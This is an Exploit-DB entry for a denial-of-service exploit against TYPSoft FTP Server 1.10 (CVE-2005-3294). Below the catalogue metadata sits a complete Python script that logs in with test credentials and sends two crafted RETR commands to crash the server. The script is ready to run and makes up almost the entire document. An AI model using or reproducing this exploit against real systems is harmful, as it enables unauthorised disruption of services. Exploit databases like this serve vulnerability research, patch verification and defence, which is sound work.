TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)

Author: emgent
type: dos
platform: windows
port: 
date_added: 2010-12-29  
date_updated: 2010-12-29  
verified: 1  
codes: CVE-2005-3294;OSVDB-19992  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/snapshot1sb.png  
application_url: http://www.exploit-db.comTYPSoft_FTPd_1.10.zip  

raw file: 15860.py  
#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili <emgent@backtrack-linux.org>
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#

import socket
import sys

user="test"
pwd="test"
buffer="\x41"

print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
print("[+] Sending second exploit stage...\n")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
s.close()